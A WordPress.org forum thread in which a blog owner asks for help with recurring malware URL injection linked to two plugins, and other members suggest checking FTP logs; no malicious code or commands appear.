WordPress.org

Ready to get started?Download WordPress

Forums

Security issue, I'd love to hear your thoughts ? PLEASE :) (4 posts)

  1. Sabinou
    Member
    Posted 2 years ago #

    Hello, it's been almost half a year I have a recurring security problem, and I really don't understand where it may be coming from.

    Could I ask for your opinion, please ?

    Since I'm trying to give all the details, I'm sorry that this is a wall of text, but I'll be VERY grateful if you can bear with it, and tell me if you have an idea about how my security has been breached repeatedly :)

    In short, my visitors sometimes report that every page of my blog is trying to inject them a malware-ish URL.

    - Once, around half a year ago, I had my footer edited with a call for a malware URL.

    -> I cleaned my template from all junk, reinstalled a clean copy of my blog template (one of Andreas Viklund's templates, it should be trustworthy), and changed every single password related to my account, FTP, email, phpmyadmin, hosting, etc.
    I also CHMODed my template's files to be impossible to edit by anyone, the admin/owner included.

    - More attacks followed, and the following times, the URL wasn't present in the source code of my website when I loaded it. My visitors and I had it loaded (fastly appearing in the "loading" part of the browser's status bar, and also noticed among the loaded and blockable elements by the AdblockPlus plugin)

    - The two first times, it appeared that deactivating LesterChan's wp-postratings plugin stopped the URL injection. I also noted that saving my blog's public html output source code to my disk, into an html file, and cropping everything but wp-postrating's call, was enough to trigger a virus alert warning when I opened the resulting html file in a browser.

    - The 4 following times, it was LesterChan's wp-polls plugin that had to be deactivated to stop the injection.

    - Every time with LesterChan's plugins, I deactivated the plugin, deleted it by FTP, and reuploaded a fresh copy grabbed from wordpress.org, and when I reactivated it, the malware injection didn't come back

    - However, using a file comparison utility (Beyond Compare), I found that my "compromised" versions of LesterChan's plugins, and the originals as served by wordpress.org or served by Lesterchan.net, were, bit to bit, character by character (binary and text comparison) : strictly identical.

    - I'll insist again, I have changed ALL my passwords even remotely related to my website. FTP accounts, admin, users, main hosting account, database, phpmyadmin, email accounts.
    Even if one password had been compromised once, no library attack, personal knoweledge of who I am or pattern guessing could have allowed to know my passwords another time.

    - LesterChan himself, when asked if he had an idea, simply suggested reuploading a fresh copy of the plugin, and had no other insight.

    - Talking about LesterChan, he also had a possible security breach, it may have allowed someone to take a first step into my blog : http://lesterchan.net/wordpress/2011/02/17/code-injection-follow-up/
    - But since then, his plugins have been cleaned from this.

    - I searched my whole blog and my blog's database for occurences of base64 encoding, of reverse (from left to right) base64 encoding, of rot13-converted base64 encoding, and found nothing.
    - I also deleted all of (root)/wp-admin , root/wp-includes, root/wp-content/ , and reinstalled the plugins and the blog template
    The attack still came back another time.

    -> I'm on shared hosting, however my web host (OVH) is rather professional at doing his job, I doubt they'd have left open the risk to be compromised by other websites on the same cluster.

    -> The Exploit Scanner plugin is also useless, for reasons unknown to mankind, it's unable to scan files larger than 10 or 15 Kb of size. At least in that size, it doesn't notice unlegititmate stuff.

    -> Regrettably, my web logs are useless. There's for more than 1 GB of text every day, and my text editors die before they manage to open the files.

    -> Could it be that some form of backdoor may have been left behind, in order to be able to use a plugin's legitimate code to inject nasty stuff ?

    ...
    And there I am, clueless.

    Please, would you have an idea, an opinion, a thought about it ?

    Thank you VERY MUCH if you can help me ! :)

  2. Samuel B
    moderator
    Posted 2 years ago #

  3. MickeyRoush
    Member
    Posted 2 years ago #

    Have you excluded the possibility that someone has not obtained your FTP credentials? Your server should have FTP logs. Review them for anything out of the ordinary. If you don't have access to them, ask your host.

  4. Sabinou
    Member
    Posted 2 years ago #

    Thank you, you two :)

    - there was no IP other than mine connecting by FTP in the last 15 days

    - I've read the Ottopress post some time ago, it's thanks to him that I thought of scanning the database for all kinds of lines and obfuscation attempts revolving around base64 encoding.

    - I also searched the text contents of all my blog files (core + plugins + theme) in search of invalid eval or base64 references, but I found nothing.
    My wp-config file refers to nothing out of the norm.

    I'm lost, I regret to say, but thanks for the two replies !

Topic Closed

This topic has been closed to new replies.

About this Topic